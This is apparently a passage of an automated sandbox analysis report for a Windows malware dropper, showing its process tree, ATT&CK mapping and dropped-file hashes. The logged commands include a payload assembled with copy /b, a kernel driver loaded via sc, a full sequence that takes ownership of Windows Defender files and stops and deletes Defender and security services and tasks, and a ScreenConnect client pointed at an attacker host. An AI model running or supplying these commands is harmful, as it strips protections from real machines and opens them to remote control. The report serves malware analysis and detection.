        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2404
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1004
        8⤵
        Program crash
        
        PID:2180
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3504
    - - C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3212
    - - C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1468
      - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2328
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FABB.tmp\FABC.tmp\FABD.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5232
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FBC5.tmp\FBC6.tmp\FBC7.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        9⤵
        
        PID:4908
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:1396
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:4656
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:1772
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:2180
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:5420
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3088
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4336
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:4408
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:3696
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:5648
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:856
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:1928
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:3648
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:3656
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:3336
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:5660
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:2800
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:3096
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:1292
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        Modifies security service
        
        PID:3412
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:4532
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:1344
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:2224
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:4864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:4936
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:4092
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:6108
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:1312
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:4756
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:1916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:1468
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:1556
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:2640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:4768
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:4708
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:4400
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:4824
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:3380
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:1604
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:5916
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:5116
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:1112
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:1396
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:1544
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:5768
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:5652
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:716
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:408
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:868
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:1984
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:1992
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:540
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:1788
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:5952
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:2436
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:436
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:2596
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z6609.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z6609.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4792
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3g52f.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3g52f.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4852

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3C603D96C683CB4FFA0DA826827CB987 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:700
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC208.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240632453 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5600
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4832
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0B8C3F161DC48FAD0BB7051F0499E6E1
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4904
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 56EA5F70E7BE22F598A8DEB6A5C13482 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:1060

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4576

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=56dfd8ab-0f5e-462c-ad0c-711d09e4754c&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=purchased"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3528
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "e321672d-b41f-4f87-9946-837ee40bf71f" "User"
  2⤵
  - Executes dropped EXE
  PID:832
- C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "695d6e40-9e1d-4e1c-bd33-3906759e1f19" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4292 -ip 4292
1⤵
PID:5600

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5924 -ip 5924
1⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Authentication Package

T1547.002

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57ff8f.rbs

Filesize
214KB

MD5
a8f50cca8835a9f29eae51d5fa9e80ab

SHA1
67e063d01e6e75139334d4c3695fc89ecf391b65

SHA256
c2f8bad243d5c677c1dbe92b3d327085716ef01a25619d54ab9c2b8a4c96f5e9

SHA512
e7bb9d2c07210db835e5fdf589551f66eae430c45f4ed9c6d414479ae093d6c0bce512c80cad598277c3a434b99f50bae585ea827b6961643c25b76bb566defe

Download Submit
C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe

Filesize
1.4MB

MD5
49e9b96d58afbed06ae2a23e396fa28f

SHA1
3a4be88fa657217e2e3ef7398a3523acefc46b45

SHA256
4d0f0f1165c992c074f2354604b4ee8e1023ba67cb2378780313e4bb7e91c225

SHA512
cd802e5717cf6e44eaa33a48c2e0ad7144d1927d7a88f6716a1b775b502222cc358d4e37bdbd17ebe37e0d378bb075463bce27619b35d60b087c73925a44a6d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10340260101\eaaa0a3e14.exe

Filesize
1.8MB

MD5
cddd1902d8f49babe494f365667c058a

SHA1
ed01b4eb4bf470d8a6895aeb5f4850991b8840c6

SHA256
10fbeafc5af0200d9b8cf6c8dd98f224f74bb2ecb5b4bc3354594935d35d70ed

SHA512
e21b0c9c04f94cb4c124968fcf9851e7d8a80a714d52436424cf7e2a2191ebc36ee6152b2a7b765b33bd2220cd340c69825775adccf616c15e27e06c6c5e80d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe

Filesize
5.4MB

MD5
f9de701299036239e95a0ff35f3fafd7

SHA1
ef43eed17c668b507a045f1ffbf6f6bc8c845cef

SHA256
9de042819c9dc1f30ea1fb3865209d1de3d3b1d90206de34fe4b19df52a0ea68

SHA512
ec357b157027a0b17cdd34e1a67956f4f620e2edda9d512a81be491233571279d08daeed12a52ffb4136f2111f8905c7b14db48018f860af453c281c576dc945

Download Submit
C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe

Filesize
4.9MB

MD5
c909efcf6df1f5cab49d335588709324

SHA1
43ace2539e76dd0aebec2ce54d4b2caae6938cd9

SHA256
d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

SHA512
68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe

Filesize
327KB

MD5
f0676528d1fc19da84c92fe256950bd7

SHA1
60064bc7b1f94c8a2ad24e31127e0b40aff40b30

SHA256
493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32

SHA512
420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\267978\Exam.com

Filesize
2KB

MD5
3518a75ae83de62392d199d5589ef95c

SHA1
e05d65351273746617850d1253a66f74ad27341d

SHA256
bc7af5dec5ea9270d20d747319410e43322ed142c53595c930db14e04a006c5d

SHA512
bbb1b62c169336379a9db13f98855661c8a4b6e06a8db81c13bb54ba309eeefb6715acb136d5e6c73dd1e16647319b132c71f133c23bb9e9d435af4dd0bcc4e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\267978\Exam.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\267978\j

Filesize
824KB

MD5
4b320b160901904e570c6fb7247af495

SHA1
19599a5c56fc826e65bc6ef19b547d6467c04696

SHA256
9969d8451e6060cee765b796495ead8bd0edd2eb16360314bb5963d1b1cdeaea

SHA512
cd78992b0fbaffa1a5a8f9ad831a88e1f95b9ad9996c98001981fd761345307fd5b9de6f3936ea0bc90ad3a07c2ec2d40420c894873cca662f39b1ba01911575

Download Submit
C:\Users\Admin\AppData\Local\Temp\Austin.vss

Filesize
85KB

MD5
ddf04a614bd9ac9c381b432de8539fc2

SHA1
5b23da3d8aba70cb759810f8650f3bbc8c1c84a2

SHA256
85e83c28ec5133e729e1d589b79ca3ef65495c02a911435cce23fb425eb770dd

SHA512
16f51dac53963d63bf68ff6f9f5c50ae455601cecb195208e27cab1ff253a7c208428f3eeffb2827f4cfd467bbaab4c70a9b03674b6a4c116e4c6d1fa667ef8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Awful

Filesize
94KB

MD5
15aa385ce02ed70ad0e6d410634dcc36

SHA1
5f4dd5f8d56d30f385ef31b746112fa65192f689

SHA256
0a769b75981a22272c8cdfd236bb51808d2299f078273df0e011e25a249b0b81

SHA512
d89d81def9258823756847243836da050be23553e66c228d38ce46b8829aa3c2b0baaa883295036f41e282a86a89f2c2437fa31f1efb4a4166c335d7085313fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Canal.vss

Filesize
81KB

MD5
213593ab55e39916c0a4ae4e9da4d127

SHA1
d0d7e7bb58cb40a6b05ecdbd61a8031ae0719adf

SHA256
ab3c6129219ac08cbcf00367b1f069441a11a42b63bcc81e46b017536d65d0c5

SHA512
b522c50777691e723e03aca6173883d0c64300bfc32a4cc6af9dff795ad5d3f6aff05f28c7c51f3efc2aa92d54994cdc989bd56adef8361b26a459de9c260c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\Conflict

Filesize
110KB

MD5
f0f47ba599c4137c2d0aff75b12ef965

SHA1
da3f01bbf0f0c84483ac62f33c42ae7bfac7565e

SHA256
f1d0d36cbc755c2f31adb6a42217d4480b9597d43fa27d2e6d8501d65b3e2a7b

SHA512
8c3ee5277edb863e5f317a4028b0f92d9f5817e5f2a53c4a5d585af6b8d517351cc2a492deaf1091e88e9aa135f84d527902fce58f6df65e95dbde9bd6121223

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cottage.vss

Filesize
71KB

MD5
17fb616cf9361301213f8eb1452f8a12

SHA1
f99234225241612a0230f51bb9b80aa15049d7a7

SHA256
5aacf86ca57a158a800f20f039108d7f6df591d1bef14ee24d91423717bc8f62

SHA512
d447ad0b5d591ac755eec3d57c5467f6057443e57c5780173755cc08cadbb579bcc06f9caf5883af97d1f7a3af5c256f2c5cd25e73ddec5a308bfdcde44a0d04

Download Submit
C:\Users\Admin\AppData\Local\Temp\Districts

Filesize
118KB

MD5
a26df6e4f2c3a7fa591a0d5b86638a9b

SHA1
91527cff100165d881f01f1c96bcc64c67589210

SHA256
9d470620a79b5ce77f0e3d5406c4c54c9f61d5fcd2f781f8db05dbebbb6ed999

SHA512
788a75c5d15d03e2a83864bf1f7654da764b0aa3d2f5acda55513ae8c660a3f3d564994c2605f2d59adf3147f9a2486f5fafb5bba7ad74bae45a548454ff5859

Download Submit
C:\Users\Admin\AppData\Local\Temp\Eddie

Filesize
101KB

MD5
eb890f27ecb2973730311a494f0eb037

SHA1
43e5be058b62c5060c0c380f398c99e0428b4b70

SHA256
1843309c96fea8c8312cc64d409eedf66f0d376c12bc691d1f0e7a2675b47d83

SHA512
54934481ae535d2e0a6b40fe097c32cd377abdf2694a9d2b1a184e50805923ffa486868f60e54ba5f6e19522f45406705c779025f43a49377bd467eeae703095

Download Submit
C:\Users\Admin\AppData\Local\Temp\Edit.vss

Filesize
27KB

MD5
296bcadefa7c73e37f7a9ad7cd1d8b11

SHA1
2fdd76294bb13246af53848310fb93fdd6b5cc14

SHA256
0c11eccd7bdef189ef62afac46bb59eb963767b70bba87642f11b41e8c5fc6fc

SHA512
33c0a823760f842f00a2cc28534ca48e27b691a1f641d2c677d51e305f05bac058fcd407b7b0ed9da5d8a921806d6d7cb4ff6c6f5284f773f7c0dc50af187356

Download Submit
C:\Users\Admin\AppData\Local\Temp\Engineers.vss

Filesize
88KB

MD5
6f6fe07204a53f777c77b3b325dd0ae3

SHA1
3f6e5290f94ab33e9b87dbe20263225805a74c2a

SHA256
b14844c9e8ae6b2733cd157c7c2c1c3b1157531ca07ec9309d6aa8d5ebedef9a

SHA512
3cc263267c0be5ff93898c264dc64ccf0b2618eccbd61b880b2e8da63e8e5f2e53e0c062b707f7b954c1457f8eec1ea71953049e5abe9fb2244d3524d6bccefe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fields.vss

Filesize
56KB

MD5
2c106b19b85802a720fa2aa6bd905c97

SHA1
41d0a1da28a66aab624364b3759fb17710abf751

SHA256
b9afe6f6076c3f5108f4d919d11945cf9fb7a0c287a0cf1068fe9e3f66aa5ba3

SHA512
58e278149e50b3b1792f92036620334d8f750378f258b005da2a19d0603ee58b15612e681b97c9fd263632019e1fed9a4b5238f0a14784f52c843c45a1c3262e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Floors.vss

Filesize
19KB

MD5
4b4b442b11d00125d408daa85489bb4a

SHA1
1418ac41a261eeaa86610ce6b38bbfba4cb5d2ab

SHA256
4834c3258ac73f7e4ff289c8d22eb3955032cd1627a1f4f933086501ce45c966

SHA512
f88032dc084b4d1e9a70302bfb5d271b4f02b90c6fff3a55269ce495e0b4a996e048c6f425fde53e6a658af85a9693e5b3ee6a285252561ae5f2db4c149ca38d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Flyer.vss

Filesize
58KB

MD5
abf66ae91c30f976687b4bdee7c82018

SHA1
9f6a246f3c6733cb43aeab00c3c654164a9f53b2

SHA256
1ebd9f449b9da28f1dbe26ec0fa279fb471c52c88726ee4a12fa8c35f721c7f4

SHA512
006fb139eeb2d12d67586493fe0319447c8e55782aeb7bf16aeda0ddbc5440fe8b1f29e5bbac28556c15233fad945693db555b0c7ded3153d5a4386977c72cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Freeware

Filesize
23KB

MD5
1e9c4c001440b157235d557ae1ee7151

SHA1
7432fb05f64c5c34bf9b6728ef66541375f58bbc

SHA256
dd57a2267de17221cf6116be83d56c1200e207c8353cc8789b9493f5e6d50644

SHA512
8cc1e7938d6270746a935eb8b2af048d704e57b4764e09584d1d838f877ac0fdbe160dc99b4c26423167eefa90b811e4638abdbbc62a4a34faff06f5c2ba0e76

Download Submit
C:\Users\Admin\AppData\Local\Temp\Garage

Filesize
64KB

MD5
415f7796bcb4a120415fab38ce4b9fd7

SHA1
c6909e9b6e3ae0129c419befc9194713928fdd65

SHA256
57ba738791fdb9219d8dfa54df6fa9759ed62eaf43fc0247897a446958da2b74

SHA512
aeaeae4e0025b2becf6a621d87a8b476dd4184d47cb0cd0f1d5a3a9ccae887355660583f2e3336b79fe34468c8c5349519d5b4c638a9d66573fa5cac725bebbb

